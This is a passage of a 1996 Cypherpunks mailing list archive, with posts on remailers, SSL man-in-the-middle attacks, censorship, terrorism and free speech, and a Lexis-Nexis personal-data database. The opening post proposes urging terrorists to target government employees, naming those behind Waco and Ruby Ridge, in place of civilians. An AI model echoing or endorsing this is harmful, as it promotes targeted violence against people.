terrorism is aimed at governments (even if practiced on >civilians). In the absence of government, terrorist incentives may be reduced. Normally efforts to reduce terrorism would be welcomed by the government. Wouldn't it be interesting to see their reaction to an organization which announces that there are too many innocent citizens who are becoming victims of terrorism, and publicly calls on these terrorists to direct their attacks to non-private individuals, possibly researching the matter and giving suggestions? I think the public would understand, after a little education, that the average terrorist doesn't really have any reason to want to kill a private citizen if a better alternative were presented. I don't suppose you'd ever see a conventional polling organization ask the public questions like, "would you prefer to see 200+ randomly-selected citizens die in an airplane bombing, or the deaths of 50 government employees most responsible for the Waco and Ruby Ridge incidents." Jim Bell jimbell at pacifier.com From tcmay at got.net Tue Sep 10 02:05:29 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 10 Sep 1996 17:05:29 +0800 Subject: Crypto Anachy MUD Message-ID: At 5:10 AM 9/10/96, Jon Leonard wrote: >Duncan Frissell wrote: >> Did anyone make the point (I gave up on the thread) that we already have a >> great Crypto Anarchy MUD with lots of the coding already done. We call it >> the Internet. Digital cash, strong crypto, remailers, everything. > >Tim May expressed doubt that it was worth the effort: Not much easier >than the real thing, and not as good. That's the closest to your point, >I think. .... >Finally, a MUD has the potential to spread crypto-anarchic ideas to people >who would not otherwise have considered them. > >It may be that I'm wasting my time, but I could come up with some useful >new crypto protocol too. Don't tar me with the "Tim said it was a waste of time" label. Rather, I said I thought it would be pretty tough to get a reasonable ontology, one with rich enough behaviors and reasonable incentives and disincentives. Simulations are an art...they were useful in nuclear war planning, where the degrees of freedom were constrained, and so on. I agree that various cryptographic and crypto anarchic constructs can be "faked" in a game (MUD) that cannot be reasonably implemented at this time in the real world. Note: Didn't Steve Jackson Games have something called "GURPS Cyberpunk" which was somewhat similar? Anyway, good luck and have fun. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From benc at geocel.com Tue Sep 10 02:05:55 1996 From: benc at geocel.com (Ben Camp) Date: Tue, 10 Sep 1996 17:05:55 +0800 Subject: BoS: Can you trust your ISP ?? Message-ID: <2.2.32.19960910063040.006e5128@lithium> Any sort of Certificate authority based protocol is dumb. It's like RSAC charging 500 bucks for rating a web site. Nothing anyone does on the web is important enough to encrypt. Anyway, as far as SSL goes...we've all heard about how proactive Netscape is in preventing key comprimise. Its too late. Ben Camp At 06:49 PM 9/9/96 -0700, Eric Murray wrote: >I~nigo Gonzalez writes: >> >> Hello, >> I'm thinking about how can I get rid off this kind of attack *before* it >> happens. Can you please send me your comments about this? I don't know so >> much about the how SSL works, but I think this is something that can >> happen... > >[classic Man-in-the-Middle attack] > > >What you described is the Man In The Middle attack, often >abbreviated on these lists as MITM. The fact that there's >an abbreviation for it should indicate to you how often >it is discussed. However it's also one of the first >problems (besides the basic encryption) that protocol >designers think of. > >It's been taken care of in SSL3- the server's certificate >must be signed by a CA that the client trusts. Unless >the digital signature can be spoofed, and it probably >can't be, the client can be certain that the server certificate it got >is really from the server that it claims to be from. > >Assuming that RSA still can't be broken, the client can be sure >that the pre-master-key material that it sends to the server >(and which is the basis for the symmetric crypto session keys) >will not be compromised. > > >If you grab a copy of the SSL3 spec (from netscape's web site) >and read the appendicies there's more good stuff about possible >attacks and what's been done to counter them. > > > > >-- >Eric Murray ericm at lne.com ericm at motorcycle.com http://www.lne.com/ericm >Principal, LNE Consulting: SSL, crypto applications, Internet security. >PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03 92 E8 AC E6 7E 27 29 AF > > > From schmidt at pin.de Tue Sep 10 02:18:06 1996 From: schmidt at pin.de (Stephan Schmidt) Date: Tue, 10 Sep 1996 17:18:06 +0800 Subject: Guns Don't Kill People, IP Does In-Reply-To: <199609091802.AA16555@crl5.crl.com> Message-ID: > > One thought : How many of you would support terrorist > > web server (say Oklahoma, TWA, Iran, Lybia, RAF, IRA, ...) ? > > > > -stephan > > Consdering how none of the above incidents are connected in any way > to the internet, what do you mean? And what if there were bomb making Sorry for my bad English, perhaps I got misunderstood. Would you run a WWW site where the (say there where some) terrorist who shot down (a wild assumtion too) the TWA plane claiming it was right and all people should fight 'evil America'. Because of your web site there are other bomb attacks in the US (or somewhere else, the country is not that important) (although it's of course impossible to proove that this bombings are 'inspired' by your web site). Would you support the freedom of speech in this way ? And to those who misunderstood my posting: a. I support the freedom of speech. b. I'm not shure I can support freedom of speech in ALL circumstances. c. I wanted to know what other people in this mailing list thought. Would they support freedom of speech for everyone ? Under all circumstances ? (I hope you got my point of view now) d. I think (hope) I'm a cypherpunk. e. Don't mistake my opinion with the opinion of the German Government, which I tried to make clear (I would be the last to support the German Government.) -stephan From scrappo.reverb at juno.com Tue Sep 10 02:28:03 1996 From: scrappo.reverb at juno.com (A L) Date: Tue, 10 Sep 1996 17:28:03 +0800 Subject: talker In-Reply-To: Message-ID: <19960909.203925.7647.0.scrappo.reverb@juno.com> >Very possible. Try reading the alt.2600 newsgroup for about a week >and see >lists. "h3y, w0w, d00dz, th1s cyberpun|< li5t is way |<3\/\/L!" >(Translation: Hey, wow, dudes, this cyberpunk list is way cool! >for those of you who are asciially impaired :) > >--- > >Zach Babayco > >zachb at netcom.com <----- finger for PGP public key >http://www.geocities.com/SiliconValley/Park/4127 Don't forget |-|eY \/\/0\/\/ d00d$! m i 3LiT3 |\|0\/\/? From schmidt at pin.de Tue Sep 10 02:35:16 1996 From: schmidt at pin.de (Stephan Schmidt) Date: Tue, 10 Sep 1996 17:35:16 +0800 Subject: ... subversive leftists In-Reply-To: <199609100157.SAA12409@web.azstarnet.com> Message-ID: > >As to the "Reichskommander," in our country, and on the Net, such jokes are > >not illegal. I rather suspect they are in Germany, either the DDR or the > >Western side. > > > >As to "tasteless and insulting," a matter of personal perspective. I find > >it helpful to call a spade a spade, and others apparently do as well. Perhaps you call a spade an axe. To all those who haven't got the point: a. Im antifa. b. It's easy to say things when noone can get you. It's harder to say the truth in the face of a skin with a baseball racket. c. I hope I get not killed for this :) > > Ja, Ja. Das ist gut. Ve make chust a little choke now. ^^^^^^^^^^^ Perhaps you meant: Ist ja gut ;) Was the Vance you quoted Jack Vance ? The author ... Just curious. -stephan From schmidt at pin.de Tue Sep 10 02:38:51 1996 From: schmidt at pin.de (Stephan Schmidt) Date: Tue, 10 Sep 1996 17:38:51 +0800 Subject: [WAS xs4all.nl] Terrorists In-Reply-To: <0DR1TD79w165w@bwalk.dm.com> Message-ID: Perhaps my connection is only disrupted accidently, but I can't access www.xs4all.nl from one account (the two others still work). IP tried : 194.109.6.100 SPG: What is the 'new' IP ? (I hope you don't think I'm a spy for the German Government :) Perhaps this time we have to proove that it's impossible to block an IP/Web site, so that all govs get a clue about who inet works. Hmm, some may claim it's better that the goverment thinks they sucessfully restricted the access to those pages. I think they should know what they can't do. -stephan From stewarts at ix.netcom.com Tue Sep 10 03:05:14 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 10 Sep 1996 18:05:14 +0800 Subject: Test...sorry about this - Reply - Reply Message-ID: <199609100742.AAA18190@dfw-ix5.ix.netcom.com> At 04:07 PM 9/9/96 -0500, you wrote: >I subscribed just once, real name. Yep, the Welcome msg is ReallyTrulyFine[M]. > I reallytrulyread it. High-traffic, though, is relative. In light of >Z.B.'s post , I thought that maybe I , too, had a mail probem. Seriously, >thanks for the info. BTW, if it's too much of a flood, you can read it with a newsreader at nntp.hks.net # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From loki at infonex.com Tue Sep 10 03:34:49 1996 From: loki at infonex.com (Lance Cottrell) Date: Tue, 10 Sep 1996 18:34:49 +0800 Subject: One Time Reply Blocks (was Re: strengthening remailerprotocols) In-Reply-To: <199609092316.QAA24498@netcom6.netcom.com> Message-ID: At 4:19 PM -0700 9/9/96, Bill Frantz wrote: >On Sun, 8 Sep 1996, Lance Cottrell wrote: > >> Mixmaster prevents replay, so flooding multiple copies of a single message >> will not work. This is the reason Mixmaster has no reply block feature. I >> can see two ways in which replies can work safely. > >To paraphrase John Von Neumann, any system which uses reply blocks is in a >state of sin. By this I mean that if there is a chain pointing at you, a >sufficiently powerful attacker can walk down that chain and find you. > >Given that, I will join the state of sin by proposing a mechanism which >will allow Alice to receive a reply from Bob, but change her mind at any >time. The basic idea is to have a one-time reply block which either Bob or >Alice can send to. If Alice thinks that too much time has elapsed, and >powerful enemies are walking down her reply block chain, she can send >herself a reply and break the chain. (She might send a reply thru each >link in the chain to break all the links.) The reason the message is not resendable is that the remailers keeps track of the serial number of that header. If forced, the log of serial numbers could be deleted, and the operator would process the message. Unless you are assuming some key archived by each remailer for the reply block, then I think it will be possible to repair the chain. -Lance ---------------------------------------------------------- Lance Cottrell loki at obscura.com PGP 2.6 key available by finger or server. Mixmaster, the next generation remailer, is now available! http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche ---------------------------------------------------------- From molnard1 at nevada.edu Tue Sep 10 03:43:28 1996 From: molnard1 at nevada.edu (DAVID A MOLNAR) Date: Tue, 10 Sep 1996 18:43:28 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <9608098423.AA842308610@smtplink.alis.ca> Message-ID: On Mon, 9 Sep 1996 jbugden at smtplink.alis.ca wrote: > This may be a hopelessly naive question, but is it possible to refuse payment in > cash? Is it really good for all debts public and private? > > James I think this was mentioned a while back. If I recall correctly, a business may not refuse cash for a debt already incurred, but may refuse to allow you to incur said debt. That is, while cash is legal tender, a business may still refuse it, on the principle that they may not be compelled to provide service to any person or class of persons. In this case, class of persons == those w/cash. So, no, if you already had a contract or obligation, they may not refuse payment in cash. They may try. However, walking up to a store counter or a FedEx depot is a different matter. One only has to wonder about restaurants which want to refuse cash...do you pay before eating, then? Ask for proof of credit before opening service? So far as I think... -David Molnar From Adamsc at io-online.com Tue Sep 10 04:53:10 1996 From: Adamsc at io-online.com (Adamsc) Date: Tue, 10 Sep 1996 19:53:10 +0800 Subject: What is the EFF doing exactly? Message-ID: <19960910083723906.AAJ105@IO-ONLINE.COM> On Mon, 9 Sep 1996 10:51:04 -0400, kamml at secret.org wrote: >>> Try and pay cash in most Fedex offices. >>I always do and as long as I have exact change I have never been >>hassled. >Fedex will not accept cash in New York City. I have tried to pay cash and >been refused. I have talked to customer service and confirmed that they >will not accept cash in NYC although they will elsewhere. You could try the "Really? Could I borrow a phone book for a minute? I need to get UPS's number." approach. It has been known to work... - "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said. * Home: Chris Adams | http://www.io-online.com/adamsc/adamsc.htp * Autoresponder: send email w/subject of "send resume" or "send PGPKEY" * Work: cadams at acucobol.com | V.M. (619)515-4894 | (619)689-6579 * Member in good standing of the GNU whirled hors d'oeuvre From gary at systemics.com Tue Sep 10 05:29:43 1996 From: gary at systemics.com (Gary Howland) Date: Tue, 10 Sep 1996 20:29:43 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <9608098423.AA842308610@smtplink.alis.ca> Message-ID: <32353B63.62319AC4@systemics.com> jbugden at smtplink.alis.ca wrote: > > This may be a hopelessly naive question, but is it possible to refuse payment in > cash? Is it really good for all debts public and private? ^^^^^ Legal tender is good for payment of debts (ie. a legal tender), but not necessarily good for *creating* those debts. Gary -- "Of course the US Constitution isn't perfect; but it's a lot better than what we have now." -- Unknown. pub 1024/C001D00D 1996/01/22 Gary Howland Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06 From rednax at asiapac.net Tue Sep 10 05:50:01 1996 From: rednax at asiapac.net (red) Date: Tue, 10 Sep 1996 20:50:01 +0800 Subject: Crypto Num Mum, Hmm Message-ID: <199609100927.RAA20720@gandalf.asiapac.net> Are perfect numbers of any use in cryptography? I have yet to come across the usage or application, let alone heard of it, but has there been any proposals? Thanks. -rednax- red_naxela at geocites.com "smile and the mirror smiles" From gary at systemics.com Tue Sep 10 05:59:18 1996 From: gary at systemics.com (Gary Howland) Date: Tue, 10 Sep 1996 20:59:18 +0800 Subject: Crypto Num Mum, Hmm In-Reply-To: Message-ID: <32353E6F.63DECDAD@systemics.com> Simon Spero wrote: > > It's kind of tempting to generate the key and certificate using this as q > and the previous largest as p, if only for machismo at keysignings :-) The machismo is that you know for sure your numbers are prime, rather than being 99.999999% confident that they are. It is not hard to generate prime numbers this large, it's just hard to prove they are really prime. (Someobdy please correct me if I'm wrong about this). Gary -- "Of course the US Constitution isn't perfect; but it's a lot better than what we have now." -- Unknown. pub 1024/C001D00D 1996/01/22 Gary Howland Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06 From gary at systemics.com Tue Sep 10 06:11:33 1996 From: gary at systemics.com (Gary Howland) Date: Tue, 10 Sep 1996 21:11:33 +0800 Subject: Satellite Movement? In-Reply-To: <960909031224_102540.2453_HHV82-1@CompuServe.COM> Message-ID: <32354236.695678E2@systemics.com> Blak Dayz wrote: > > I was out buying groceries and after they scanned the shit through they > told me that all the ATMs in the City were out due to connection problems. So i > go home and start trying to scan for the shits and i cant find them. If anyone > knows what the hell happened i would appreciate the details. I believe it may > have been a solar flare that caused the companies to redirect their satellites. > It would do me alot of help considering i had to pay CASH (i hate paper) for the ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ > stuff and i would like to complain to the fucking JPL and satt. operators about > them warning the public. Haven't been lurking long, have you? Gary -- "Of course the US Constitution isn't perfect; but it's a lot better than what we have now." -- Unknown. pub 1024/C001D00D 1996/01/22 Gary Howland Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06 From declan at eff.org Tue Sep 10 06:57:33 1996 From: declan at eff.org (Declan McCullagh) Date: Tue, 10 Sep 1996 21:57:33 +0800 Subject: TWA 800 - Serious thread. In-Reply-To: <32349A90.51BD@gte.net> Message-ID: Last night I started reading "Main Justice," by Pulitzer-winner Jim McGee and Brian Duffy, about the DoJ's recent history of organized crime/drug war fighting and wiretapping. The book describes how Federal agencies have been granted more leeway in terms of entrapment thanks mostly to a conservative Supreme Court. Scary stuff. -Declan On Mon, 9 Sep 1996, Dale Thorn wrote: > > Per the tendency of federal agencies to let it be publicly known that > they lie openly to trap suspects (and apparently this technique has been > OK'd for local enforcement as well): > > This is going to backfire on them (and us), and probably has already. > If govt. protects its "sources and methods", however nefarious, to the > extent that the public is never asked to assent to these methods (even > though a few of us know about them anyway), then the public doesn't have > to become overtly cynical about what's going on. > > On the other hand, whether you think the people have this much right to > know or not, when the public consciousness embraces the concept that the > police openly and regularly lie (and that it's a "good thing" they do), > the result will be greater public cynicism, distrust, paranoia, hatred, > and anarchy (the bad kind). > // declan at eff.org // I do not represent the EFF // declan at well.com // From frissell at panix.com Tue Sep 10 07:15:47 1996 From: frissell at panix.com (Duncan Frissell) Date: Tue, 10 Sep 1996 22:15:47 +0800 Subject: China joins Singapore, Germany, .... Message-ID: <2.2.32.19960910110046.00de3c78@panix.com> At 04:41 AM 9/9/96 -0700, Timothy C. May wrote: >Prison sentences in Germany for those who reveal forbidden information >about "the Holocaust," In a country where you get 10 months for stabbing a famous tennis star in the back, prison isn't much of a penalty. >prison terms (or worse) for dissidents in Burma, >China, and, of course, various other nations and "democratic people's >republics." > >Even here in the United States, connecting to an illegal site may mean >imprisonment. (The charge: trafficking in child pornography, for example.) The percentage of total hits that will end in jail terms or executions is meaninglessly small as a percentage of total hits, though. You must admit that a ban on 100 sites out of all the sites in the world is pretty insignificant. The swamping effects of thousands and soon millions of sites means the governments of the world won't even be able to evaluate a significant percentage even if they want to. And all this *before* we apply any of our technical fixes. DCF From frissell at panix.com Tue Sep 10 07:26:20 1996 From: frissell at panix.com (Duncan Frissell) Date: Tue, 10 Sep 1996 22:26:20 +0800 Subject: Terrorists Message-ID: <2.2.32.19960910110051.00dea4d0@panix.com> At 06:58 PM 9/9/96 -0700, Timothy C. May wrote: >Remember, folks, it is _governments_ which interfere with natural movements >of people, capital, but not birds. > >I don't want to jeopardize my reputation as a List.Racist, but I think one >of the longterm (not in the next 15 years) implications of the things we >talk about will be the increased lowering of national borders. (Yes, I have >long talked about national borders being only speed bumps...here I'm >talking about _physical_ borders.) I assume defacto open borders pretty quickly. We currently have 40 million crossings a year (mostly us and Canadians) but as people get richer that is bound to grow rapidly. Since technology causes wealth and wealthy people like to travel and governments don't like to block wealthy travelers and travelers can increase faster than border guards swamping occurs. What happens when 2000-passenger surface effect aircraft (or other new travel technologies) start showing up on the market and la migra has to deal with high volume travel. They're having trouble with current levels at JFK and Miami. They scale back. I'm not predicting de jure open borders just defacto open borders. And with those who work on the net being able to work from everywhere and nowhere, they will be able to work in countries where they do not have work authorization as easily as a novelist can today. DCF From declan at eff.org Tue Sep 10 07:45:51 1996 From: declan at eff.org (Declan McCullagh) Date: Tue, 10 Sep 1996 22:45:51 +0800 Subject: China joins Singapore, Germany, .... In-Reply-To: Message-ID: The revised Hatch "child porn" legislation criminalizes even *attempting* to download the forbidden data. And has two definitions of child porn that create a kind of legal buffet for prosectors' delectation. -Declan On Mon, 9 Sep 1996, Timothy C. May wrote: > Even here in the United States, connecting to an illegal site may mean > imprisonment. (The charge: trafficking in child pornography, for example.) > > Rather than saying such laws are "meaningless," developing blinded, > steganographic, etc. proxies may be a more useful strategy. > > --Tim May > > We got computers, we're tapping phone lines, I know that that ain't allowed. > ---------:---------:---------:---------:---------:---------:---------:---- > Timothy C. May | Crypto Anarchy: encryption, digital money, > tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero > W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, > Higher Power: 2^1,257,787-1 | black markets, collapse of governments. > "National borders aren't even speed bumps on the information superhighway." > > > > // declan at eff.org // I do not represent the EFF // declan at well.com // From asgaard at Cor.sos.sll.se Tue Sep 10 07:55:56 1996 From: asgaard at Cor.sos.sll.se (Asgaard) Date: Tue, 10 Sep 1996 22:55:56 +0800 Subject: Movies In-Reply-To: Message-ID: On Mon, 9 Sep 1996, Timothy C. May wrote: > is viewed as being essentially Mexican. (Some great humor, too. And a good > murder mystery. And a love story. Conspiracy, humor, murder, love...all the > ingredients of a great story. All three major American races collide, and I think the love ingredients, all too common in movies without adding anything to the real story, are a pain in the behind. I usually channel- surf during the coitus scene (one in every movie for the last year). These things are just for wimmin. If a man wants to see love on the screen, then there is the Hard Core stuff. Asgaard From frissell at panix.com Tue Sep 10 08:00:51 1996 From: frissell at panix.com (Duncan Frissell) Date: Tue, 10 Sep 1996 23:00:51 +0800 Subject: [WAS xs4all.nl] Terrorists Message-ID: <2.2.32.19960910113535.00defde0@panix.com> At 05:54 PM 9/9/96 -0700, Timothy C. May wrote: >Given the mounting hysteria about terrorism (by the government, at least), >and given the various laws on the books, I would not be surprised to see >some Web sites prosecuted as "harboring" terrorists terrorist-symps. > >If any of you are not citizens of the U.S., and are here on visas, I would >give this some real serious thought. Of course, maybe deportation is a >blessing in disguise. > Course in 1951 they tried the same thing against Commies with the Smith Act. Even authorized concentration camps for 'em and everything. But it didn't work. We were still up to our asses in Commies even with the Act. They even captured the White House eventually. I don't think the anit-terroism act will be any more effective. DCF From schmidt at pin.de Tue Sep 10 08:44:50 1996 From: schmidt at pin.de (Stephan Schmidt) Date: Tue, 10 Sep 1996 23:44:50 +0800 Subject: [WAS xs4all.nl] Terrorists (fwd) Message-ID: Stephan Schmidt wrote: > > Perhaps my connection is only disrupted accidently, but > I can't access www.xs4all.nl from one account > (the two others still work). > IP tried : 194.109.6.100 > > SPG: What is the 'new' IP ? The numbers are rotating every hour, so i can send you a the ip-number every hour to trace to :) > (I hope you don't think I'm a spy for > the German Government :) spy's are not interrested in ip-numbers i think. > Perhaps this time we have to > proove that it's impossible to > block an IP/Web site, so that all govs > get a clue about who inet works. i think they have already or will be informed by the ICTF in some day's. Look at: http://www.anwalt.de/ictf/_960910d.htm Also note one of the first lines: ACHTUNG: Dieses Dokument (einschlie�lich aller Anlagen) darf bis zu seiner Vervollst�ndigung und Freigabe weder zitiert, in WWW-Server eingestellt, noch abgedruckt werden. :) Henk ps. stephan, can you forward this to the list. I'm reading this list on a server with mail2news, also as a newsgroup i cant reply to ;( From matt at nova.org Tue Sep 10 09:20:26 1996 From: matt at nova.org (Matthew Lyle) Date: Wed, 11 Sep 1996 00:20:26 +0800 Subject: Court challenge to AOL junk-mail blocks In-Reply-To: Message-ID: On Mon, 9 Sep 1996, snow wrote: > On Fri, 6 Sep 1996 AwakenToMe at aol.com wrote: > > Tell me about it. Im on AOL. WHO CARESSSSSSS if ya get one MAYBE two pieces > > of mail you take LESS than a second to delete them both with the handy > > delete key. These people are wasting more time complaining about it than they > > will ever do actually deleting it. > > I would guess that AOL isn't doing it just because of user complaints. > AOL has millions of accounts, and spammers try to hit ALL of the addresses. > That probably (I am guessing here) doubles (or triples) the load on AOL's > already over burdened mail system. The news reports that I've read also say that, at least in the case of Cyberpromo, 75% of their email database is AOL addresses. Matt From Mullen.Patrick at mail.ndhm.gtegsc.com Tue Sep 10 13:09:42 1996 From: Mullen.Patrick at mail.ndhm.gtegsc.com (Mullen Patrick) Date: Wed, 11 Sep 1996 04:09:42 +0800 Subject: FW: RRE: Lexis-Nexis personal information database Message-ID: Okay, here's the story. The below is true, except they do NOT have your mother's maiden name. The have your name, SSN, current addy, two previous addys, and date of birth. They also have aliases, if available. Their main customers are attorneys who use this _online_ service to search for people. They've been in business for 20 years, but this list has only been run for a few months. Their customer base (I assume including all databases, which includes lists of ALL legal actions (traffic tickets??)) is 750,000. Hm. Oh, and the SSN isn't given out, but it can be used to search for someone more easily. So, when you do a query, all you'll get is Name, address, phone number, and date of birth, as well as two previous addresses, for what it's worth. The only thing you get that you wouldn't find out by looking in the White Pages is the DOB, and that you could make up. Another case of mass-hysteria (but, of course, *I'm* no longer on the list... ;-) BTW, they're very nice as you get taken off the computer. LONG time on hold, though... Spyjure _______________________________________________________________________________ From: E. Allen Smith on Tue, Sep 10, 1996 3:14 Subject: RRE: Lexis-Nexis personal information database To: cypherpunks at toad.com One wonders exactly how much of this information is compiled from government-generated sources? The SSN is automatically originally government-derived, of course... -Allen From: IN%"rre at weber.ucsd.edu" 7-SEP-1996 02:02:07.36 [Excerpt from Privacy Forum 5.17.] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= This message was forwarded through the Red Rock Eater News Service (RRE). Send any replies to the original author, listed in the From: field below. You are welcome to send the message along to others but please do not use the "redirect" command. For information on RRE, including instructions for (un)subscribing, send an empty message to rre-help at weber.ucsd.edu =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Date: Tue, 3 Sep 96 12:01 PDT From: privacy at vortex.com (PRIVACY Forum) Subject: PRIVACY Forum Digest V05 #17 PRIVACY Forum Digest Tuesday, 3 September 1996 Volume 05 : Issue 17 ----------------------------------------------------------------------------- Date: Tue, 3 Sep 1996 11:22:15 -0400 (EDT) From: Larry Hunter Subject: Lexis-Nexis personal information database Lexis-Nexis sells a commercial database called "Ptrax" which holds detailed personal information on nearly all Americans (L-N claims it contains 300 million names). This database includes name, current address, up to two previous addresses, phone number, birth-date, social security number, mother's maiden name and possible other personal information. This database is kept quite current. Through the Nexis Express service, this information could be available to any individual with a credit card. As most readers will are aware, such information could easily be used for theft of identity and other frauds. It is possible to have one's name removed from this database by making a telephone request. Call (800)543-6862, select option 4 ("all other questions") and tell the representative answering that you wish to remove your name from the Ptrax database. You may also send a fax to (513)865-7360, or physical mail to LEXIS-NEXIS / P.O. Box 933 / Dayton, Ohio 45401-0933. Sending physical mail to confirm your name has been removed is always a good idea. As word of the existence of this database has spread on the net, Lexis-Nexis has been inundated with calls, and has set up a special set of operators to handle the volume. In addition, Andrew Bleh (rhymes with "Play") is a manager responsible for this product, and is the person to whom complaints about the service could be directed. He can be reached at the above 800 number, selection option 4 and then ask for extension 3385. The information in this note has been been confirmed by me, and was originally provided in forwarded messages from Russell Whitaker, Jason Werner, Vern Winters, Katherine Florman and Reuben Snipper. Larry Hunter hunter at intr.net ------------------------------ End of PRIVACY Forum Digest 05.17 ************************ ------------------ RFC822 Header Follows ------------------ Received: by mail.ndhm.gtegsc.com with SMTP;10 Sep 1996 03:14:49 -0400 Received: from toad.com by delphi.ndhm.gtegsc.com with SMTP; Tue, 10 Sep 1996 7:12:48 GMT Received: (from majordom at localhost) by toad.com (8.7.5/8.7.3) id UAA22945 for cypherpunks-outgoing; Mon, 9 Sep 1996 20:08:38 -0700 (PDT) Received: from OCELOT.RUTGERS.EDU (ocelot.rutgers.edu [128.6.11.33]) by toad.com (8.7.5/8.7.3) with SMTP id UAA22938 for ; Mon, 9 Sep 1996 20:08:25 -0700 (PDT) Received: from mbcl.rutgers.edu by mbcl.rutgers.edu (PMDF #12194) id <01I9AIVKYUFO9ULM12 at mbcl.rutgers.edu>; Mon, 9 Sep 1996 23:03 EDT Date: Mon, 9 Sep 1996 23:03 EDT From: "E. Allen Smith" Subject: RRE: Lexis-Nexis personal information database To: cypherpunks at toad.com Message-id: <01I9AIVKYUFO9ULM12 at mbcl.rutgers.edu> X-Envelope-to: cypherpunks at toad.com X-VMS-To: IN%"cypherpunks at toad.com" Sender: owner-cypherpunks at toad.com Precedence: bulk From m5 at vail.tivoli.com Tue Sep 10 13:10:05 1996 From: m5 at vail.tivoli.com (Mike McNally) Date: Wed, 11 Sep 1996 04:10:05 +0800 Subject: China joins Singapore, Germany, .... In-Reply-To: Message-ID: <3235697D.A17@vail.tivoli.com> Declan McCullagh wrote: > > The revised Hatch "child porn" legislation criminalizes even > *attempting* to download the forbidden data. What would it look like, exactly, when they went in to arrest the AltaVista search engine? ______c_________________________________________________________________ Mike M Nally * Tiv^H^H^H IBM * Austin TX * For the time being, m5 at tivoli.com * m101 at io.com * * three heads and eight arms. From cox at transarc.com Tue Sep 10 13:11:46 1996 From: cox at transarc.com (Ben Cox) Date: Wed, 11 Sep 1996 04:11:46 +0800 Subject: BoS: Can you trust your ISP ?? In-Reply-To: <2.2.32.19960910063040.006e5128@lithium> Message-ID: On Tue, 10 Sep 1996, Ben Camp wrote: > [...] Nothing anyone does on the web is > important enough to encrypt. This is an astoundingly naive statement. __ Ben Cox cox at transarc.com From roy at sendai.scytale.com Tue Sep 10 13:13:51 1996 From: roy at sendai.scytale.com (Roy M. Silvernail) Date: Wed, 11 Sep 1996 04:13:51 +0800 Subject: ALPHACIPHER - An unbreakable encryption program. In-Reply-To: <01bb9e75.fcf69000$a4dc9dcc@survival> Message-ID: <960910.071433.8A6.rnr.w165w@sendai.scytale.com> -----BEGIN PGP SIGNED MESSAGE----- In alt.security, survival at aa.net writes: [ attribution scrambled ] >> True, but somehow I have a feeling that Alphacipher is not a one-time >> pad, and thus is breakable. > > This assumption is not true. ALPHACIPHER is, indeed, based upon an OTP. > We've solved all of the problems associated with pad creation, > distribution, packaging and many other concerns that have previously > limited the use of a cipher in this class. Their web page alludes to a OTP-like operation where you have to purchase key "refills". It doesn't say where they store the escrowed copies of the key material. > Visit our net page at http://www.aa.net/cyber-survival-hq for more > information, and read the reply in response to the unfounded attack by > Curtin, posted above. I recommend this page, if only for the great conspiracy theory about automated telephone line scanning. - -- Roy M. Silvernail [ ] roy at scytale.com PGP Public Key fingerprint = 31 86 EC B9 DB 76 A7 54 13 0B 6A 6B CC 09 18 B6 Key available from pubkey at scytale.com -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMjVcuRvikii9febJAQG1wQP+PPevphnwFiUnhwfHfi9eSLI/lJz++eaw X4Xo6Oa343rpnNoNw0D51aIRZbRmh9QRt1nhNbD3fPvNPjjvzxW58zgAtX5+kxfk b54pBzlVTEYcPBFXatfQuCjhhd95gjaMXYsKAx6rUNt02QFihGWqID48huN9nFOZ 0MlhN5IxIBk= =y4kc -----END PGP SIGNATURE----- From trei at process.com Tue Sep 10 13:41:48 1996 From: trei at process.com (Peter Trei) Date: Wed, 11 Sep 1996 04:41:48 +0800 Subject: Court challenge to AOL junk-mail blocks Message-ID: <199609101349.GAA00716@toad.com> [you can't bounce spam back to it's source] > Why not? Because spammers _invariably_ forge the return addresses to keep > exactly that from happening. What I do is look into the headers, and start bouncing it back to the domain administrator, if I can't find any better mail address. Pegasus makes it easy to automate this. I *do* send one politely worded request first - it takes a second spamming before I'll set up the rule. Peter Trei trei at process.com From fletch at ain.bls.com Tue Sep 10 14:11:02 1996 From: fletch at ain.bls.com (Mike Fletcher) Date: Wed, 11 Sep 1996 05:11:02 +0800 Subject: Guns Don't Kill People, IP Does In-Reply-To: Message-ID: <9609101437.AA06866@outland> > > > One thought : How many of you would support terrorist > > > web server (say Oklahoma, TWA, Iran, Lybia, RAF, IRA, ...) ? > > > > > > -stephan > > > > Consdering how none of the above incidents are connected in any way > > to the internet, what do you mean? And what if there were bomb making > > Sorry for my bad English, perhaps I got misunderstood. > Would you run a WWW site where the (say there where some) > terrorist who shot down (a wild assumtion too) the TWA plane > claiming it was right and all people should fight 'evil > America'. Because of your web site there are other bomb > attacks in the US (or somewhere else, the country is not that > important) (although it's of course impossible to proove that > this bombings are 'inspired' by your web site). > Would you support the freedom of speech in this way ? Call me crazy, but maybe if "terrorists" had a web page to use to get out their particular message they wouldn't need to go out and blow things up to get noticed 